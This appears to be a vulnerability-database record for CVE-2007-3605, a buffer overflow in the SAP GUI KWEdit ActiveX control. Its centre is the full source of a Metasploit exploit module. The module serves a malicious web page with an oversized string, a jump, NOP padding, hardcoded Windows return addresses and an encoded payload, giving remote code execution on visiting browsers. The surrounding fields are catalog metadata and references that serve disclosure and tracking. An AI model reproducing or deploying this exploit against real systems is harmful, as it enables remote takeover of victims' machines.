ID

VAR-E-200707-0132


CVE

cve_id:CVE-2007-3605

Trust: 2.7

cve_id:CVE-2007-3607

Trust: 0.3

cve_id:CVE-2007-3608

Trust: 0.3

sources: BID: 24776 // BID: 24772 // PACKETSTORM: 83119 // EXPLOIT-DB: 16498 // EDBNET: 39190

EDB ID

16498


TITLE

EnjoySAP SAP GUI - ActiveX Control Buffer Overflow (Metasploit) - Windows remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 16498

DESCRIPTION

EnjoySAP SAP GUI - ActiveX Control Buffer Overflow (Metasploit). CVE-2007-3605CVE-37690 . remote exploit for Windows platform

Trust: 0.6

sources: EXPLOIT-DB: 16498

AFFECTED PRODUCTS

vendor:enjoysapmodel:sap guiscope: - version: -

Trust: 1.0

vendor:sapmodel:enjoysapscope:eqversion:0

Trust: 0.6

vendor:enjoysapmodel:sap gui activex controlscope: - version: -

Trust: 0.5

sources: BID: 24776 // BID: 24772 // PACKETSTORM: 83119 // EXPLOIT-DB: 16498

EXPLOIT

##
# $Id: enjoysapgui_preparetoposthtml.rb 9525 2010-06-15 07:18:08Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::HttpServer::HTML

def initialize(info = {})
super(update_info(info,
'Name' => 'EnjoySAP SAP GUI ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in SAP KWEdit ActiveX
Control (kwedit.dll 6400.1.1.41) provided by EnjoySAP GUI. By sending
an overly long string to the "PrepareToPostHTML()" method, an attacker
may be able to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC' ],
'Version' => '$Revision: 9525 $',
'References' =>
[
[ 'CVE', '2007-3605' ],
[ 'OSVDB', '37690' ],
[ 'BID', '24772' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 800,
'BadChars' => "\x00\x09\x0a\x0d'\\",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ],
[ 'Windows 2000 Pro English All', { 'Ret' => 0x75022ac4 } ],

],
'DisclosureDate' => 'Jul 05 2007',
'DefaultTarget' => 0))
end

def autofilter
false
end

def check_dependencies
use_zlib
end

def on_request_uri(cli, request)
# Re-generate the payload
return if ((p = regenerate_payload(cli)) == nil)

# Randomize some things
vname = rand_text_alpha(rand(100) + 1)
strname = rand_text_alpha(rand(100) + 1)

# Build the exploit buffer
sploit = rand_text_alpha(1036) + Rex::Arch::X86.jmp_short(6)
sploit << make_nops(2) + [target.ret].pack('V') + p.encoded

# Build out the message
content = %Q|<html>
<object classid='clsid:2137278D-EF5C-11D3-96CE-0004AC965257' id='#{vname}' /></object>
<script language='javascript'>
#{strname} = new String('#{sploit}')
#{vname}.PrepareToPostHTML(#{strname})
</script>
</html>
|

print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

# Transmit the response to the client
send_response_html(cli, content)

# Handle the payload
handler(cli)
end

end

Trust: 1.0

sources: EXPLOIT-DB: 16498

EXPLOIT LANGUAGE

rb

Trust: 0.6

sources: EXPLOIT-DB: 16498

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 16498

TYPE

ActiveX Control Buffer Overflow (Metasploit)

Trust: 1.0

sources: EXPLOIT-DB: 16498

TAGS

tag:Metasploit Framework (MSF)

Trust: 1.0

tag:exploit

Trust: 0.5

tag:overflow

Trust: 0.5

tag:arbitrary

Trust: 0.5

tag:activex

Trust: 0.5

sources: PACKETSTORM: 83119 // EXPLOIT-DB: 16498

CREDITS

Metasploit

Trust: 0.6

sources: EXPLOIT-DB: 16498

EXTERNAL IDS

db:NVDid:CVE-2007-3605

Trust: 2.7

db:EXPLOIT-DBid:16498

Trust: 1.6

db:EDBNETid:39190

Trust: 0.6

db:PACKETSTORMid:83119

Trust: 0.5

db:NVDid:CVE-2007-3607

Trust: 0.3

db:NVDid:CVE-2007-3608

Trust: 0.3

db:BIDid:24776

Trust: 0.3

db:BIDid:24772

Trust: 0.3

sources: BID: 24776 // BID: 24772 // PACKETSTORM: 83119 // EXPLOIT-DB: 16498 // EDBNET: 39190

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2007-3605

Trust: 2.1

url:http://www.sap.com

Trust: 0.6

url:https://www.exploit-db.com/exploits/16498/

Trust: 0.6

url:http://support.microsoft.com/kb/240797

Trust: 0.3

sources: BID: 24776 // BID: 24772 // PACKETSTORM: 83119 // EXPLOIT-DB: 16498 // EDBNET: 39190

SOURCES

db:BIDid:24776
db:BIDid:24772
db:PACKETSTORMid:83119
db:EXPLOIT-DBid:16498
db:EDBNETid:39190

LAST UPDATE DATE

2022-07-27T09:23:12.479000+00:00


SOURCES UPDATE DATE

db:BIDid:24776date:2016-07-06T14:17:00
db:BIDid:24772date:2015-04-16T18:11:00

SOURCES RELEASE DATE

db:BIDid:24776date:2007-07-05T00:00:00
db:BIDid:24772date:2007-07-05T00:00:00
db:PACKETSTORMid:83119date:2009-11-26T00:34:53
db:EXPLOIT-DBid:16498date:2010-06-15T00:00:00
db:EDBNETid:39190date:2010-06-15T00:00:00